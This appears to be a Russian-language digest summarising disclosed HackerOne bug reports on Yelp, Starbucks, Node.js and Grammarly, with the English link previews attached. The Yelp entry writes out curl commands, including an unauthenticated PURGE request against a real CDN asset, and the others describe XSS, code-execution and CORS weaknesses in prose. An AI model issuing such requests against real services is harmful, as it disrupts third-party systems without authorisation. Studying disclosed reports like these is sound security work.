После этого участник приводит последовательность шагов, показывающих, как это можно сделать. Первый запрос на проверку заголовков ресурса (`curl https://s3-media0.fl.yelpcdn.com/assets/public/pride@2x.yelp_design_web.yji-629fce3629585b9db2137d9353196628.png --head`) показывает, что кэш для данного ресурса на стороне хостинга сохранен (`X-Cache-Hits: 1, 14`). Затем демонстрируется возможность инвалидации кэша (`curl https://s3-media0.fl.yelpcdn.com/assets/public/pride@2x.yelp_design_web.yji-629fce3629585b9db2137d9353196628.png --head -XPURGE`). В результате подобного запроса каталог в кэше очищается, что подтверждают заголовки (`X-Cache-Hits: 1, 0`).
По мнению автора репорта, данный метод может привести к дополнительным затратам на пропускную способность.
HackerOne
Yelp disclosed on HackerOne: PURGE is not authenticated
Hi @yelp Team,
Anyone can issue a PURGE request for any resource and invalidate your caches. That can lead to increased bandwidth costs.
Fetching the resource headers, we can see in the...
Anyone can issue a PURGE request for any resource and invalidate your caches. That can lead to increased bandwidth costs.
Fetching the resource headers, we can see in the...
https://hackerone.com/reports/629745
Этот репорт связан с уязвимостью в веб-приложении Starbucks, которая позволяет атакующему выполнять произвольный JavaScript на страницах сайта, что может привести к утечке конфиденциальных данных и выполнению нежелательных действий от имени жертвы. Пошаговые инструкции для воспроизведения ошибки находятся в отчете, а также перечислены поддерживающие материалы и рекомендации для исправления уязвимости. Кроме того, автор отмечает, как он обнаружил эту уязвимость, упоминая, что старался обойти фильтр двойных кавычек для инъекции SQL.
Этот репорт связан с уязвимостью в веб-приложении Starbucks, которая позволяет атакующему выполнять произвольный JavaScript на страницах сайта, что может привести к утечке конфиденциальных данных и выполнению нежелательных действий от имени жертвы. Пошаговые инструкции для воспроизведения ошибки находятся в отчете, а также перечислены поддерживающие материалы и рекомендации для исправления уязвимости. Кроме того, автор отмечает, как он обнаружил эту уязвимость, упоминая, что старался обойти фильтр двойных кавычек для инъекции SQL.
HackerOne
Starbucks disclosed on HackerOne: Reflected cross-site scripting on...
@stealthy discovered that invalid page requests resulting in a 404 error page response were vulnerable to Reflected Cross-site Scripting (XSS) when double encoding a link and persuading the user to...
https://hackerone.com/reports/629879
Этот репорт описывает уязвимость в Node.js `loader.js`, которая может быть использована злоумышленником для выполнения произвольного кода на удаленной системе. Конкретнее, `%userprofile%` пути, такие как `%userprofile%\.node_moduels` и `%userprofile%\.node_libraries`, добавляются в `globalPaths`, что может позволить создавать новые файлы JavaScript и выполнение опасного кода на целевой системе. Шаги для воспроизведения включают установку последней версии Node.js на ОС Windows, выполнение нескольких команд в командной строке и запуск Node.js. Для исправления рекомендуется изменить код `loader.js`, удалив строки, добавляющие указанные пути в `globalPaths`. Уязвимость серьезна, т.к. многие программы используют Node.js на Windows системах, а злоумышленник может использовать уязвимость, чтобы обойти антивирусную защиту и выполнить произвольный код на целевой системе.
Этот репорт описывает уязвимость в Node.js `loader.js`, которая может быть использована злоумышленником для выполнения произвольного кода на удаленной системе. Конкретнее, `%userprofile%` пути, такие как `%userprofile%\.node_moduels` и `%userprofile%\.node_libraries`, добавляются в `globalPaths`, что может позволить создавать новые файлы JavaScript и выполнение опасного кода на целевой системе. Шаги для воспроизведения включают установку последней версии Node.js на ОС Windows, выполнение нескольких команд в командной строке и запуск Node.js. Для исправления рекомендуется изменить код `loader.js`, удалив строки, добавляющие указанные пути в `globalPaths`. Уязвимость серьезна, т.к. многие программы используют Node.js на Windows системах, а злоумышленник может использовать уязвимость, чтобы обойти антивирусную защиту и выполнить произвольный код на целевой системе.
HackerOne
Node.js disclosed on HackerOne: loader.js is not secure
## Summary:
Node.js `loader.js` can be exploited by an attacker
## The...
Node.js `loader.js` can be exploited by an attacker
## The...
https://hackerone.com/reports/629892
Этот репорт описывает уязвимость в системе Grammarly связанную с неправильной настройкой CORS, что может привести к утечке данных пользователей и несанкционированным действиям от имени пользователя. Уязвимость позволяет злоумышленнику использовать атаку MITM, чтобы подменять запросы клиента и изменять ответы сервера, а также реализовывать JavaScript, который выполняет запросы к уязвимым эндпоинтам на сервере. В результате уязвимости, злоумышленник может получить доступ к личной и конфиденциальной информации пользователей и изменять настройки подписки. В репорте приведены два примера кода JavaScript для осуществления атаки. Чтобы защититься от таких атак, необходимо установить проверку передаваемых CSRF токенов, которая пока не была реализована в системе Grammarly.
Этот репорт описывает уязвимость в системе Grammarly связанную с неправильной настройкой CORS, что может привести к утечке данных пользователей и несанкционированным действиям от имени пользователя. Уязвимость позволяет злоумышленнику использовать атаку MITM, чтобы подменять запросы клиента и изменять ответы сервера, а также реализовывать JavaScript, который выполняет запросы к уязвимым эндпоинтам на сервере. В результате уязвимости, злоумышленник может получить доступ к личной и конфиденциальной информации пользователей и изменять настройки подписки. В репорте приведены два примера кода JavaScript для осуществления атаки. Чтобы защититься от таких атак, необходимо установить проверку передаваемых CSRF токенов, которая пока не была реализована в системе Grammarly.
HackerOne
Grammarly disclosed on HackerOne: Lack of CSRF header validation at...
Hello!
## Description
I found that setting up a CORS in some places will check the protocol, but it allows using http scheme. In addition, any subdomain is considered trusted. If the origin is...
## Description
I found that setting up a CORS in some places will check the protocol, but it allows using http scheme. In addition, any subdomain is considered trusted. If the origin is...